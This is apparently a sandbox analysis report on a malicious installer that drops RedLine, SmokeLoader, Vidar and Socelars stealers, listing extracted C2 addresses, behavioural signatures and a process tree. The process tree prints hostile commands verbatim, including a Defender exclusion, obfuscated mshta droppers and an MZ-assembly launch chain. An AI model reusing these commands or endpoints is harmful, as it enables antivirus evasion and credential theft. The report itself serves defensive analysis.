Resubmissions

13-10-2021 18:35

211013-w8lxmaegdr 10

13-10-2021 12:38

211013-pvkdbadhdm 10

13-10-2021 05:30

211013-f7nrtsdfa3 10

12-10-2021 20:25

211012-y7qwasdbh4 10

11-10-2021 21:02

211011-zvywtaabdq 10

Analysis

  • max time kernel
    1803s
  • max time network
    1796s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    13-10-2021 05:30

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.4MB

  • MD5

    26f28bf2dc2b6afc0dd99cb6ea3879b8

  • SHA1

    9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05

  • SHA256

    5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa

  • SHA512

    5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b

Malware Config

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.2

Botnet

933

C2

https://mas.to/@serg4325

Attributes
  • profile_id

    933

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 45 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 12 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 16 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 17 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 28 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 29 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 49 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 22 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2672
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Suspicious use of SetThreadContext
      PID:2756
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:4792
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2692
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2488
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2436
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1980
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1428
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1288
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1196
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1084
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:984
                      • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                        C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                        2⤵
                          PID:7084
                        • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                          C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                          2⤵
                            PID:8748
                          • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                            C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                            2⤵
                              PID:5908
                            • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                              C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                              2⤵
                                PID:3964
                              • C:\Users\Admin\AppData\Roaming\tcihgsv
                                C:\Users\Admin\AppData\Roaming\tcihgsv
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:1052
                                • C:\Users\Admin\AppData\Roaming\tcihgsv
                                  C:\Users\Admin\AppData\Roaming\tcihgsv
                                  3⤵
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:512
                              • C:\Users\Admin\AppData\Roaming\wtihgsv
                                C:\Users\Admin\AppData\Roaming\wtihgsv
                                2⤵
                                  PID:7004
                                • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                  C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                  2⤵
                                    PID:3264
                                  • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                    C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                    2⤵
                                      PID:528
                                    • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                      C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                      2⤵
                                        PID:5552
                                      • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                        C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                        2⤵
                                          PID:492
                                        • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                          C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                          2⤵
                                            PID:8820
                                          • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                            C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                            2⤵
                                              PID:8624
                                            • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                              C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                              2⤵
                                                PID:5448
                                              • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                2⤵
                                                  PID:8984
                                                • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                  C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                  2⤵
                                                    PID:4244
                                                  • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                    C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                    2⤵
                                                      PID:5464
                                                    • C:\Users\Admin\AppData\Roaming\tcihgsv
                                                      C:\Users\Admin\AppData\Roaming\tcihgsv
                                                      2⤵
                                                      • Suspicious use of SetThreadContext
                                                      PID:9088
                                                      • C:\Users\Admin\AppData\Roaming\tcihgsv
                                                        C:\Users\Admin\AppData\Roaming\tcihgsv
                                                        3⤵
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:1320
                                                    • C:\Users\Admin\AppData\Roaming\wtihgsv
                                                      C:\Users\Admin\AppData\Roaming\wtihgsv
                                                      2⤵
                                                        PID:8436
                                                      • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                        C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                        2⤵
                                                          PID:9172
                                                        • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                          C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                          2⤵
                                                            PID:1596
                                                          • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                            C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                            2⤵
                                                              PID:6420
                                                            • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                              C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                              2⤵
                                                                PID:3548
                                                              • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                2⤵
                                                                  PID:6168
                                                                • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                  2⤵
                                                                    PID:6584
                                                                  • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                    2⤵
                                                                      PID:1744
                                                                    • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                      2⤵
                                                                        PID:1224
                                                                      • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                        2⤵
                                                                          PID:4740
                                                                        • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                          2⤵
                                                                            PID:7868
                                                                          • C:\Users\Admin\AppData\Roaming\tcihgsv
                                                                            C:\Users\Admin\AppData\Roaming\tcihgsv
                                                                            2⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:8340
                                                                            • C:\Users\Admin\AppData\Roaming\tcihgsv
                                                                              C:\Users\Admin\AppData\Roaming\tcihgsv
                                                                              3⤵
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:4140
                                                                          • C:\Users\Admin\AppData\Roaming\wtihgsv
                                                                            C:\Users\Admin\AppData\Roaming\wtihgsv
                                                                            2⤵
                                                                              PID:2052
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll",AqDFSDlmWiui
                                                                              2⤵
                                                                              • Windows security modification
                                                                              • Drops file in System32 directory
                                                                              • Modifies data under HKEY_USERS
                                                                              PID:2580
                                                                            • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                              2⤵
                                                                                PID:1272
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                              1⤵
                                                                                PID:364
                                                                              • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                                                                                1⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3800
                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1420
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\setup_install.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\setup_install.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4408
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                      4⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4092
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                        5⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:592
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe
                                                                                      4⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4140
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon20762bc3f6.exe
                                                                                        Mon20762bc3f6.exe
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1400
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone
                                                                                      4⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4264
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon206b909958ed4.exe
                                                                                        Mon206b909958ed4.exe /mixone
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1328
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 660
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1840
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 696
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2280
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 648
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          PID:5336
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 700
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          PID:6100
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 848
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          PID:6100
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 836
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          PID:908
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 1108
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          PID:7036
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 1280
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          PID:6416
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 1312
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          PID:520
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 1436
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          PID:6204
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 1428
                                                                                          6⤵
                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                          • Program crash
                                                                                          PID:7072
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe
                                                                                      4⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4320
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon20927aab1e5.exe
                                                                                        Mon20927aab1e5.exe
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1596
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon20927aab1e5.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon20927aab1e5.exe
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1724
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe
                                                                                      4⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:660
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon203f01ac7e6.exe
                                                                                        Mon203f01ac7e6.exe
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1896
                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                          "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon203f01ac7e6.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                          6⤵
                                                                                            PID:3092
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon203f01ac7e6.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon203f01ac7e6.exe" ) do taskkill /F -Im "%~NxU"
                                                                                              7⤵
                                                                                                PID:2160
                                                                                                • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                  09xU.EXE -pPtzyIkqLZoCarb5ew
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2388
                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                    "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                    9⤵
                                                                                                      PID:5484
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                                                        10⤵
                                                                                                          PID:5984
                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                        "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                                                        9⤵
                                                                                                          PID:5604
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                                                            10⤵
                                                                                                              PID:2940
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                11⤵
                                                                                                                  PID:7008
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                                                                  11⤵
                                                                                                                    PID:7080
                                                                                                                  • C:\Windows\SysWOW64\control.exe
                                                                                                                    control .\R6f7sE.I
                                                                                                                    11⤵
                                                                                                                      PID:7104
                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                        12⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:6680
                                                                                                                        • C:\Windows\system32\RunDll32.exe
                                                                                                                          C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                          13⤵
                                                                                                                            PID:7916
                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                                                              14⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:7980
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /F -Im "Mon203f01ac7e6.exe"
                                                                                                                  8⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:2324
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c Mon209c830507d573.exe
                                                                                                          4⤵
                                                                                                            PID:508
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon209c830507d573.exe
                                                                                                              Mon209c830507d573.exe
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:2516
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon209c830507d573.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon209c830507d573.exe
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1924
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe
                                                                                                            4⤵
                                                                                                              PID:492
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon2083f8d8970a0b2d.exe
                                                                                                                Mon2083f8d8970a0b2d.exe
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2700
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe
                                                                                                              4⤵
                                                                                                                PID:1252
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon209b3da1556b9a317.exe
                                                                                                                  Mon209b3da1556b9a317.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2656
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:1236
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2208
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:3920
                                                                                                                      • C:\Users\Admin\AppData\Roaming\7159579.scr
                                                                                                                        "C:\Users\Admin\AppData\Roaming\7159579.scr" /S
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4248
                                                                                                                      • C:\Users\Admin\AppData\Roaming\8448902.scr
                                                                                                                        "C:\Users\Admin\AppData\Roaming\8448902.scr" /S
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:5312
                                                                                                                      • C:\Users\Admin\AppData\Roaming\5081757.scr
                                                                                                                        "C:\Users\Admin\AppData\Roaming\5081757.scr" /S
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:5712
                                                                                                                      • C:\Users\Admin\AppData\Roaming\1487885.scr
                                                                                                                        "C:\Users\Admin\AppData\Roaming\1487885.scr" /S
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                        PID:5852
                                                                                                                      • C:\Users\Admin\AppData\Roaming\4471689.scr
                                                                                                                        "C:\Users\Admin\AppData\Roaming\4471689.scr" /S
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5956
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4.exe
